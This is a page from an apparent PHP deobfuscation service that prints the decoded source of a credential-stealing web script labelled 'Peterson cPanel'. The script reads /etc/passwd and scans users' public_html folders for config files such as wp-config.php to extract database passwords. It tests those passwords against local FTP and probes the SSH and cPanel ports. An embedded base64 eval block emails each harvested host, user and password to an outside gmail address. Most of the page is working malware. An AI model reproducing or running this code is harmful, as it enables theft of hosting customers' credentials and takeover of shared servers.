Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(str_rot13(base64_decode('vUt7RuLIFv+fQtHDtSpucSCAruOLO4CCTk4BBYlt2TyapCGvWg..

Decoded Output download

<html><head><title>Peterson cPanel</title></head><body>/*
Brainfuck
Edited by Peterson
(c) http://p-range.info
*/
echo '<html><head><title>Peterson cPanel</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
    $str = fgets($passwd);
        if ($i > 35)
        {
            $pos = strpos($str,':');
            $username = substr($str,0,$pos);
            $dirz = '/home/'.$username.'/public_html/';
            if (($username != ''))
            {
                if (is_readable($dirz))
                {
                    array_push($users,$username);
                    array_push($pub,$dirz);
                }
            }
          }
    $i++;
}
###################
echo '<br><br><textarea cols="100" rows="20">';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd
";
echo "[+] Founded ".sizeof($pub)." readable public_html directories
";
echo "[~] Searching for passwords in config files...

";
foreach ($users as $user)
{
    $path = "/home/$user/public_html/";
    read_dir($path,$user);
}
echo "
[+] Done
";
function read_dir($path,$username)
{
    if ($handle = opendir($path))
    {
        while (false !== ($file = readdir($handle)))
        {
            $fpath = "$path$file";
            if (($file != '.') and ($file != '..'))
            {
                if (is_readable($fpath))
                {
                    $dr = $fpath."/";
                    if (is_dir($dr))
                    {
                        read_dir($dr,$username);
                    }
                    else
                    {
                         if (
                             ($file=='config.php')
                         or ($file=='config.inc.php')
                         or ($file=='conf.php')
                         or ($file=='settings.php')
                         or ($file=='configuration.php')
                         or ($file=='wp_config.php')
                         or ($file=='wp-config.php')
                          or ($file=='inc.php')
                         or ($file=='setup.php')
                         or ($file=='dbconf.php')
                         or ($file=='dbconfig.php')
                         or ($file=='db.inc.php')
                         or ($file=='dbconnect.php')
                         or ($file=='connect.php')
                         or ($file=='common.php')
                         or ($file=='config_global.php')
                         or ($file=='db.php')
                         or ($file=='connect.inc.php')
                         or ($file=='e107_config.php')
                         or ($file=='dbconnect.inc.php'))
                        {
                            $pass = get_pass($fpath);
                            if ($pass != '')
                            {
                                echo "[+] $fpath
$pass
";
                                ftp_check($username,$pass);
                            }
                        }
                    }
                }
            }
        }
    }
}
function get_pass($link)
{
    @$config = fopen($link,'r');
    while(!feof($config))
    {
        $line = fgets($config);
        if (strstr($line,'pass')
        or strstr($line,'pwd')
        or strstr($line,'db_pass')
        or strstr($line,'dbpass')
        or strstr($line,'passwd'))
        {
            if (strrpos($line,'"'))
            {
                preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
                $pass = str_replace("]=\"","",$pass);
            }

            else
                preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
                $pass = str_replace("]='","",$pass);
            return $pass[2];
        }
    }
}
function ftp_check($login,$pass)
{
    @$ftp = ftp_connect('127.0.0.1');
    if ($ftp)
    {
        @$res = ftp_login($ftp,$login,$pass);
        if ($res)
        {
            echo '[FTP] '.$login.':'.$pass."  Success !

";

eval(base64_decode('JGRvbWFpbiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsKJHAyMSA9IDIxOwokcDIyID0gMjI7CiRwMjA4MiA9IDIwODI7CiRjcDIyID0gZnNvY2tvcGVuKCRkb21haW4sJHAyMiwkZXJybm8sJGVycnN0ciwxMCk7CiRjcDIxID0gZnNvY2tvcGVuKCRkb21haW4sJHAyMSwkZXJybm8sJGVycnN0ciwxMCk7CiRjcDIwODIgPSBmc29ja29wZW4oJGRvbWFpbiwkcDIwODIsJGVycm5vLCRlcnJzdHIsMTApOwoKCmlmKCEkY3AyMikKeyRhMT0iRXJyb3IiO30KZWxzZQp7JGExPSJTdWNjZXNzIjtmY2xvc2UoJGNwMjIpO30KCmlmKCEkY3AyMSkKeyRhMj0iRXJyb3IiO30KZWxzZQp7JGEyPSJTdWNjZXNzIjtmY2xvc2UoJGNwMjEpO30KCmlmKCEkY3AyMDgyKQp7JGEzPSJFcnJvciI7fQplbHNlCnskYTM9IlN1Y2Nlc3MiO2ZjbG9zZSgkY3AyMDgyKTt9CgoKJHBzbiA9IgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4KY1BhbmVsIFVwZGF0ZSBJbmZvIFsgUG93ZXJlZCBieSBQZXRlcnNvbiBdIFxuCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cbgpIb3N0IDogJGRvbWFpblxuClVzZXIgOiAkbG9naW5cbgpQYXNzIDogJHBhc3NcbgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4KQWNjZXB0IFBvcnQgXG4KU1NIIDogUG9ydCAkYTFcbgpGVFAgOiBQb3J0ICRhMlxuCmNQYW5lbCA6IFBvcnQgJGEzXG4KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuCu+/vSAyMDEyIFBvd2VyZWQgYnkgUGV0ZXJzb25cbgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4iOwokdG8gPSAicGV0ZXJzb25yZWlnbnNAZ21haWwuY29tIjsKJHJlY2lwID0gInBldGVyc29ucmVpZ25zQGdtYWlsLmNvbSI7CiRzdWJqZWN0ID0gImNQYW5lbCBBY2Nlc1MgVXBkYXRlIjsKJGhlYWRlcnMgPSAiRnJvbTogdXBkYXRlPG5ld3NAY3AtdXBkYXRlLmluZm8+IjsKbWFpbCgkdG8sJHN1YmplY3QsJHBzbiwkaGVhZGVycyk7Cm1haWwoJHJlY2lwLCRzdWJqZWN0LCRwc24sJGhlYWRlcnMpOw=='));

            echo '[SSH] Port'   .':' .$a1. "  !

";
            echo '[FTP] Port'   .':' .$a2. "  !

";
            echo '[cPanel] Port' .':' .$a3. "  !

";

        }
        else ftp_quit($ftp);
    }
}
echo '</textarea><br><br><b>cPaneL Bruteforce Recode By Peterson</b></body></html>';

Did this file decode correctly?

Original Code

eval(gzinflate(str_rot13(base64_decode('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'))));

Function Calls

ini_get 1
gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 ec7564e687da15dd8ffe4ec1db49fbbf
Eval Count 1
Decode Time 116 ms